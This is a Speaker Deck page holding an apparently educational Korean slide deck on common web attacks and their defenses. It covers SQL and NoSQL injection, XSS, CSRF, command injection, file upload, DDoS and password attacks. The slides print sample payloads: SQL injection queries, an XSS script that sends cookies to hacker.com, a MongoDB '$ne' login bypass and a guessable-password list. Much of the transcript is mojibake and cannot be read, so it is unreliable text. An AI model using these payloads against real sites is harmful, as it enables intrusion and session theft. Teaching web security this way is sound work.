Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
웹 개발을 위해 꼭 알아야하는 보안 공격
Search
Lee Sun-Hyoup
February 22, 2021
Programming
0
44
웹 개발을 위해 꼭 알아야하는 보안 공격
통신보안
Lee Sun-Hyoup
February 22, 2021
Tweet
Share
More Decks by Lee Sun-Hyoup
See All by Lee Sun-Hyoup
Railway-Oriented Programming과 Spring
kciter
0
150
Kotlin Script 활용하기
kciter
0
680
MongoDB 이해하기
kciter
0
670
Other Decks in Programming
See All in Programming
Updates on MLS on Ruby (and maybe more)
sylph01
1
180
Putting The Genie in the Bottle - A Crash Course on running LLMs on Android
iurysza
0
140
請來的 AI Agent 同事們在寫程式時,怎麼用 pytest 去除各種幻想與盲點
keitheis
0
120
print("Hello, World")
eddie
2
530
Improving my own Ruby thereafter
sisshiki1969
1
160
AWS発のAIエディタKiroを使ってみた
iriikeita
1
190
旅行プランAIエージェント開発の裏側
ippo012
2
920
Amazon RDS 向けに提供されている MCP Server と仕組みを調べてみた/jawsug-okayama-2025-aurora-mcp
takahashiikki
1
110
AIコーディングAgentとの向き合い方
eycjur
0
280
JSONataを使ってみよう Step Functionsが楽しくなる実践テクニック #devio2025
dafujii
1
590
How Android Uses Data Structures Behind The Scenes
l2hyunwoo
0
480
MCPでVibe Working。そして、結局はContext Eng(略)/ Working with Vibe on MCP And Context Eng
rkaga
5
2.3k
Featured
See All Featured
Typedesign – Prime Four
hannesfritz
42
2.8k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
113
20k
How to Ace a Technical Interview
jacobian
279
23k
Designing for Performance
lara
610
69k
Done Done
chrislema
185
16k
Six Lessons from altMBA
skipperchong
28
4k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
31
2.2k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
127
53k
Why Our Code Smells
bkeepers
PRO
339
57k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
36
2.5k
Code Review Best Practice
trishagee
71
19k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
30
9.7k
Transcript
ਢѐߊਸਤ೧ ԙঌইঠೞחࠁউҕѺ 2021. 02. 22 ࢶഈ
য়טݾ ਢࠁউী೧೧ೞҊӝୡҕѺӝߨҗ೧Ѿߑߨਸ೧ೠ
ਢࠁউ ਢࢎஂডਸҕѺೞחӝࣿਤഈਵ۽ ਢಕܳాೞৈ ӂೠহחदझమীӔೞѢաؘఠਬ߂Ҧ৬э೯ਤ݈ܳೠ https://ko.wikipedia.org/wiki/ਢ_೧ఊ
None
ೠࣽрपࣻ۽ࢲ࠺झоݎೡࣻب😨
ցޖনೠҕѺӝߨj 42-*OKFDUJPO 944 $43'"UUBDL 'JMF6QMPBE"UUBDL $PNNBOE*OKFDUJPO #VGGFS0WFSGMPX %JDUJPOBSZ"UUBDL
ࠗחইפ؊ۄبӝୡੋѪ ԙঌইىঠೠ
ঌইঠೞחҕѺӝߨ 4UBSU
42-*OKFDUJPO ↟ࢲߡীࢲप೯غח42-ਸঈਵ۽ਊೞחҕѺ ↟ӝઓ42-ীঈੋ42-ਸੑೠ ↟ؘఠఎஂ ઁ١оמೞ ↟ڦܻݶࢲ࠺झઙܐп
42-*OKFDUJPOࢎ۹
42-*OKFDUJPOࢎ۹
42-*OKFDUJPOߑয ↟42-ীࢲౠ߹ೠܳоחޙܳझாೠ FY =O =U ] j
↟ળ࠺ػࢶਸࢎਊೠ ↟ਃ્ۄ࠳۞ܻ ۨਕীࢲইੜ݄ইળ
42-*OKFDUJPOबച ↟&SSPSCBTFE42-*OKFDUJPO ↟ੌࠗ۞42-ী۞ܳߊࢤदெਗೞחࠁܳஂٙೠ ↟௪ܻޙ୶ஏ %#ݺ ప࠶ݺ١ஂٙоמೞ
42-*OKFDUJPOबച ↟#MJOE42-*OKFDUJPO ↟2VFSZѾҗଵѢਸࠁҊਗೞחࠁо ઓೞחঌࣻ ୶ۿ ↟%# 5BCMFݺਸঌࣻ ↟42-.BQ ex)
SELECT * FROM users WHERE user_id = '1' and substring(database(),1,2)='us'#
42-*OKFDUJPOबച ↟6OJPO42-*OKFDUJPO ↟6OJPOݺ۸ਸਊೞৈࠁܳஂٙೠ ex) SELECT * FROM users WHERE user_id
= '1' or 1=1 UNION SELECT '',id,pw from users#
944 ↟$SPTF4JUF4DSJQUJOH ↟ਢಕীঈࢿझ݀ܳੑೞחҕѺ ↟ࢎਊࠁܳఎஂೡࣻ ↟ڦܻݶ݆Ѫਸח
944ࢎ۹ <script>document.URL='http://hacker.com?'+document.cookie</script> ѱद౸ ਊо Ӗਸ ੍ਸ ٸ ష ఎஂ!!!
944ߑয ↟)5.-ఠ݂ਸೠറ%#ীೠ FY TDSJQU IUNM IFBE NFUB jj
↟݅ডਸਤ೧ۿূ٘ীࢲبఠ݂ೠ
944बച ↟খࢲࣗѐೠߑध4UPSFE944 ↟3FGMFDUFE944 ↟%0.#BTFE944
944बച ↟3FGMFDUFE944 ↟Ѩ࢝য١ਸࠁৈחҔীझ݀ܳबחҕѺ ↟63-ਸࢎਊীѱ־ܰѱٜ݅ݶҕѺࢿҕ https://papago.naver.com/?sk=ko&tk=en&st=<script>…</script>
944बച ↟%0.#BTFE944 ↟%0.ীঈੋझ݀ܳबחҕѺ ↟࠳ۄо೧ࢳೞחױ҅ীࢲߊࢤغחҕѺ
$43'"UUBDL ↟$SPTT4JUF3FRVFTU'PSHFSZ ↟ҕѺоࢎਊܳਊೞৈਢࢎী ਃਸࠁղחҕѺ
$43'"UUBDLࢎ۹ о admin 1q2w3e4r ۽Ӓੋ ਃ ࢿҕ/पಁ ࢿҕ೮ਵݶ
$43'"UUBDLߑয ↟3FGFSSFS$IFDL ↟ೲਊೠبݫੋ݅ਃೲۅೞب۾ࢸ ↟$43'5PLFO ↟ݽٚਃীషਸߊәೞৈࢲߡীࢲѨૐ ↟$"15$)" ↟ࢎۈਃೠѪݏחѨૐ
$PNNBOE*OKFDUJPO ↟গܻா࣌ীࢲࢎਊغחदझమݺ۸ীঈੋ ݺ۸যܳੑೞחҕѺ 8FC4IFMM"UUBDL ↟ࢲߡSPPUӂೠਸஂٙೡࣻ ↟ڦܻݶࢲ࠺झઙܐп
$PNNBOE*OKFDUJPOࢎ۹ )BDLFS UFYUUYUJGDPOGJH system("cat ${var}") FYFDVUF 8FC4IFMM
$PNNBOE*OKFDUJPOߑয ↟оәदझమೣࣻחࢎਊ9 ↟хೠޙܳఠ݂ FY ]
'JMF6QMPBE"UUBDL ↟ঈࢿझ݀ੌਸস۽٘ೞחҕѺ ↟স۽٘റੌਤܳইप೯दఃݶҕѺࢿҕ ↟ڦܻݶࢲ࠺झઙܐп
'JMF6QMPBE"UUBDLࢎ۹ Upload 1 2 Command WebShell
'JMF6QMPBE"UUBDLߑয ↟ഛੌఋੑѨࢎ ↟স۽٘ੌਸդࣻചೞৈ ↟ౠࣻޙоನೣػ҃স۽٘Ә (Null byte Injection ߑয)
+BWBTDSJQU*OKFDUJPO ↟$MJFOU4JEFীࢲ+BWBTDSJQUܳੑदఃחҕѺ ↟܁DPOTPMF١ਸా೧ઑоמೞ ↟$MJFOU4JEFীхೠؘఠܳ֍ਸ҃ఎஂоמ
+BWBTDSJQU*OKFDUJPOࢎ۹
+BWBTDSJQU*OKFDUJPOߑয ↟$MJFOU4JEFূхೠࠁܳ֍ঋח ↟ؘఠਬബࢿѨࢎоਃೠ҃ࢲߡ৬ాनೠ $MJFOUীࢲѨࢎೞݶউػ
%%P4 ↟%JTUSJCVUFE%FOJBMPG4FSWJDF ↟ࢲߡী࠺࢚ਵ۽݆ېਸࠁղחҕѺ ↟ࢲ࠺झо݃࠺غҊ݆࠺ਊࣗݽػ
%%P4ࢎ۹ Zombie PC Traffic
%%P4ߑয ↟ઁੌױࣽೠؘઁੌ݄ӝয۵ ↟ഛоמೠࢲ࠺झҳઑࢸ҅ ↟*1ఠ݂ ↟ࣛܖ࣌ҳݒj
%JDUJPOBSZ"UUBDL ↟ܻࢎী١۾೧֬ޙৌਸঐഐ۽ੑೞחҕѺ ↟#SVUF'PSDFੌઙ
%JDUJPOBSZ"UUBDLࢎ۹ admin apple banana cyber . . . 1q2w3e4r
%JDUJPOBSZ"UUBDLߑয ↟оחޙৌঐഐ۽١۾ޅೞب۾ࢸ ↟"DDPVOU-PDLPVU1PMJDZ ↟GBDUPSੋૐ
3BJOCPX5BCMF ↟೧दೣࣻܳਊೠಣޙਸݽفदெ֬ ↟҅ఎஂറঐഐਗޙਸঌইղӝਤ೧ࢎਊ
3BJOCPX5BCMFߑয ↟4BMUࢎਊ ↟,FZ4USFUDIJOH ↟1#,%' #DSZQU١ঐഐചঌҊ્ܻࢎਊ
.POHP%#*OKFDUJPO ↟42-*OKFDUJPOۢঈੋчਸ֍য %#ܳઑೞחҕѺ ↟ڦܻݶࢲ࠺झઙܐп
.POHP%#*OKFDUJPOࢎ۹ db.collection.find({ "email": "
[email protected]
", "password": password }) db.collection.find({ "email": "
[email protected]
",
"password": { "$ne": "-" }) password = { "$ne": "-" }
.POHP%#*OKFDUJPOߑয ↟ೱਸࣻחޙܳఠ݂ೠ FY \ ^ < >
#VGGFS0WFSGMPX ↟#VGGFS0WFSGMPXܳా೧ܲݫݽܻীӔೞחҕѺ ↟ܲݫݽܻীӔ߂ઁযооמೞӝٸޙীݺ ↟दझమ೧ఊӝߨӝبೞ ↟ڦܻݶࢲ࠺झઙܐп
None